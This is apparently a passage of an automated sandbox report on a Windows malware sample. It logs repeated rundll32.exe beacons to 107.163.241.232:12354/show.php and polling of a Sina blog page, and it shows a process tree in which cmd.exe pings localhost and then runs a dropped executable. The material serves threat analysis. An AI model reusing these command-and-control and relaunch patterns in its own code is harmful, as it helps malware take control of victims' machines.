Dec 11, 2024 16:28:29.621835947 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.7	51044	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:29.694099903 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.7	51048	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:30.005439997 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.7	51051	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:30.916925907 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.7	51071	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:31.676639080 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.7	51084	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:31.859164953 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.7	51085	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:31.859757900 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.7	51106	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:32.253715038 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.7	51124	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:32.700623989 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.7	51142	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:33.106040001 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.7	51153	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:33.875350952 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:28:35.208256960 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:28:34 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.7	51156	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:34.191982031 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.7	51164	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:34.743330956 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.7	51165	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:34.743455887 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.7	51168	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:35.024197102 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.7	51177	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:35.155750036 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.7	51185	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:35.264064074 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.7	51202	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:35.504882097 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.7	51225	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:35.871404886 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.7	51229	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:35.910130024 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.7	51230	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:35.912133932 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.7	51241	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:36.108390093 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.7	51253	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:36.272738934 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.7	51258	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:36.355114937 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.7	51273	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:36.649377108 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49794	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:12 UTC	142	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49834	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:16 UTC	142	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49876	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:20 UTC	142	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49958	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:30 UTC	142	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive
2024-12-11 15:27:30 UTC	846	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 11 Dec 2024 15:27:39 GMT Content-Type: text/html Content-Length: 325 Connection: close Set-Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; path=/; expires=Sat, 09-Dec-34 15:27:30 GMT; domain=.sina.com.cn Set-Cookie: U_TRS2=0000001a.75808b75.6759af62.10b83b67; path=/; domain=.sina.com.cn Origin-Agent-Cluster: ?0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Security-Policy: upgrade-insecure-requests; Expires: Wed, 11 Dec 2024 15:27:29 GMT Cache-Control: no-cache Pragma: no-cache DPOOL_HEADER: 10.69.14.40 strict-transport-security: max-age=180 Content-Security-Policy: upgrade-insecure-requests X-Cache: MISS from 464291b26ee9 Content-Security-Policy: upgrade-insecure-requests X-Via-SSL: ssl.28.sinag1.bx.lb.sinanode.com
2024-12-11 15:27:30 UTC	325	IN	Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 2d 31 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 73 74 6f 72 65 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 20 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 2f 63 6f 6e 74 72 6f 6c 2e 62 6c 6f 67 2e 73 69 6e 61 2e 63 6f 6d 2e 63 6e 2f 6d 79 Data Ascii: <meta http-equiv="Expires" CONTENT="-1" ><meta http-equiv="Cache-Control" CONTENT="no-cache" ><meta http-equiv="Cache-Control" CONTENT="no-store" ><meta http-equiv="Pragma" CONTENT="no-cache" ><script>window.location.href='//control.blog.sina.com.cn/my

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	50022	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:35 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	50072	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:39 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	50121	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:43 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	50172	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:47 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	50229	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:52 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
2024-12-11 15:27:52 UTC	638	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 11 Dec 2024 15:27:56 GMT Content-Type: text/html Content-Length: 325 Connection: close Origin-Agent-Cluster: ?0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Security-Policy: upgrade-insecure-requests; Expires: Wed, 11 Dec 2024 15:27:51 GMT Cache-Control: no-cache Pragma: no-cache DPOOL_HEADER: 10.13.3.73 strict-transport-security: max-age=180 Content-Security-Policy: upgrade-insecure-requests X-Cache: MISS from 464291b26ee9 Content-Security-Policy: upgrade-insecure-requests X-Via-SSL: ssl.25.sinag1.bx.lb.sinanode.com
2024-12-11 15:27:52 UTC	325	IN	Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 2d 31 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 73 74 6f 72 65 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 20 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 2f 63 6f 6e 74 72 6f 6c 2e 62 6c 6f 67 2e 73 69 6e 61 2e 63 6f 6d 2e 63 6e 2f 6d 79 Data Ascii: <meta http-equiv="Expires" CONTENT="-1" ><meta http-equiv="Cache-Control" CONTENT="no-cache" ><meta http-equiv="Cache-Control" CONTENT="no-store" ><meta http-equiv="Pragma" CONTENT="no-cache" ><script>window.location.href='//control.blog.sina.com.cn/my

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	50322	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:27:59 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	50369	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:28:04 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	50420	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:28:09 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
2024-12-11 15:28:09 UTC	639	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 11 Dec 2024 15:28:11 GMT Content-Type: text/html Content-Length: 325 Connection: close Origin-Agent-Cluster: ?0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Security-Policy: upgrade-insecure-requests; Expires: Wed, 11 Dec 2024 15:28:08 GMT Cache-Control: no-cache Pragma: no-cache DPOOL_HEADER: 10.13.3.117 strict-transport-security: max-age=180 Content-Security-Policy: upgrade-insecure-requests X-Cache: MISS from 0c5f09b916ff Content-Security-Policy: upgrade-insecure-requests X-Via-SSL: ssl.31.sinag1.bx.lb.sinanode.com
2024-12-11 15:28:09 UTC	325	IN	Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 2d 31 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 73 74 6f 72 65 22 20 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 20 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 2f 63 6f 6e 74 72 6f 6c 2e 62 6c 6f 67 2e 73 69 6e 61 2e 63 6f 6d 2e 63 6e 2f 6d 79 Data Ascii: <meta http-equiv="Expires" CONTENT="-1" ><meta http-equiv="Cache-Control" CONTENT="no-cache" ><meta http-equiv="Cache-Control" CONTENT="no-store" ><meta http-equiv="Pragma" CONTENT="no-cache" ><script>window.location.href='//control.blog.sina.com.cn/my

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	50502	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:28:14 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	50590	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:28:18 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	50703	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:28:23 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	51645	202.108.0.52	443	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 15:28:46 UTC	238	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Target ID:	4
Start time:	10:26:51
Start date:	11/12/2024
Path:	C:\Users\user\Desktop\peks66Iy06.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\peks66Iy06.exe"
Imagebase:	0x400000
File size:	149'686 bytes
MD5 hash:	0D7CB4C47AE6155162D23073A90DAAE6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:26:52
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 2&c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:26:52
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
